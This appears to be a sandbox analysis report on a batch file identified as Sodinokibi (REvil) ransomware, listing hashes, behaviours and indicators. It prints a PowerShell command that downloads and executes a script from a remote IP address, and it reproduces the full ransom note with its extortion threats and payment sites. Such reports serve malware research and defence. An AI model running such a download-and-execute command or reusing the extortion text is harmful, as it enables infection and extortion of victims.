Overview

overview

10

Static

static

d011698f0a...f4.bat

windows7_x64

10

d011698f0a...f4.bat

windows10_x64

10

Analysis

  • max time kernel
    48s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    22-08-2020 07:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d011698f0a0292375484c2ce503fd5f4.bat

  • Size

    221B

  • MD5

    2620ae9cab8fc22007e8184ba8972c49

  • SHA1

    fa1095550cb3150a7cadd676bb594e5c60060a2c

  • SHA256

    6031919615418117acd8af53074b43ca886e452074663ea10765ae56ff83b813

  • SHA512

    8a2b0c4537d60159956ce3edf73f136ee9bd2c7194b0a0dbed17c234df0a8bb5a0effb21752bd9d6d5c7b87e43ae50f7e6fb58e613a9e61533b0b7274dfe8ebe

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4

Extracted

Path

C:\ae5ba-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ae5ba. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3A11937213753CE2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 5w9nnsHg6CMB5NUNdzRjrO+8aa+9YWGfiLqCg9KlvfEDsMRzl5pb+wA/1hM8oo4B DUwstCR2O05OPsQ0rfE7PfDK03XAc+/o5mkss3dii76hrBxzPpOKTNcVFSba5Xew l+vI5QXq4iVrzGtjdhqlWlmXF8ePZ0jrj/9JrY+9DTVplWQAcfN0t3Y1KsPFgd2J NZWIj0tZc+x0ZVw/k5YY2lcm/O3CqWWAhakwDrYHsAIdETFaGzDjTkirdcQIcyzO IFDLIgg7/knfsf/m3r9gkOyqStJhQdWEYnJs+XyH0JLZ6/j/wyHFSC4EPxqvEuEw D6K47gndQD0F87PTE8A3AIZiHeLcMpXpDi/e4c3pr+5xsXyir1+OaArqukLcqEVZ whrcYoBVaoupBhtQoR9LuANzjbFck1FjFUEUABwHvSQw0T5MVyZnCs5UaQRkg9SH zG9LGNd/O+rHhnT6NclzxMDqX3pYYigduwWxvgaOha5qu65umfm9bWwMAe2DBN18 KsQgUZwvp1kDzB7fOyfFQxvO3lgQaql7B8mN1zP6Qh8ruatOKcI9ZQj6cIt0i/PR 1B/E10qFydd6n5t030DRd1cZLDOmpRJMiLOF41htd4lXcVAW0FNRP9oP3J1ZWmUx V1xiBnK0ar6pU9eJaHLmXJdcNuAo0Y8GuUUUgc4EfAEF1BvEej9dga29l2pm/2gA bXV/R3KfvOIqRyg1eDJbR9hiR4BUto3ETyRIQIRZejqDsfYqMj+I5WE1EC4hnH7W toPQoIOwk5CuLRH4QSx5mj10g3CiPgZ3M2bTzHW9o1dFwkb35SU7mo/xK78u/9P5 VjYrNkl+RqG2WfjMzoeHo0zkJf5gFj/WGleiIXDwzUz3HRfCznQDvEf2ZEwOb0Es IVNY3SfK7Id2xaR985bDnsyaXMQMuw8CJ/FGH7OQfHlUjbvLsxeRcXqCjFKG3SH+ mmWlcEM3mG4Yj/Srdm/wU5xgCy6ooJGe2n1XQ2keuJvFHazLRjZiUy3gHIOVFr4s Bd91ptX6P1UMqAYDnWu4nDUUU+flYQ92F3xMdHQogh2emdjoVv/r0/QWZ07zcBcE d7cSfiMFWaZNsbjzgO04NHY8oewYUWvIMXPlxP4fxkSXGa1yTzpZCP7+s8PsuTGv teFXFsCWGWLMzApdUm3jH3TJGlByCyC6hRdWaClP0w0I26lryHNaE3Gi224AcVLZ HMpFtIm7Fh0xMxx+rPr7lejgNbLTzwmteEARCFCOt5nNvHooVl7USkbS4vY+jCgY XadyGzp8dIffPAkSMYmeWG6cDFxjytugflzB8P91 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2

http://decryptor.cc/3A11937213753CE2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 37 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d011698f0a0292375484c2ce503fd5f4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4');Invoke-HGSGRZQUHJGJQK;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:620
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1120

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/620-0-0x0000000000000000-mapping.dmp

    Download

  • memory/620-1-0x0000000073D50000-0x000000007443E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/620-2-0x0000000000640000-0x0000000000641000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-3-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-4-0x0000000002590000-0x0000000002591000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-5-0x0000000002860000-0x0000000002861000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-8-0x00000000056E0000-0x00000000056E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-13-0x0000000005770000-0x0000000005771000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-14-0x0000000006220000-0x0000000006221000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/620-23-0x0000000008D28000-0x0000000008D9C000-memory.dmp

    Filesize

    464KB

    Download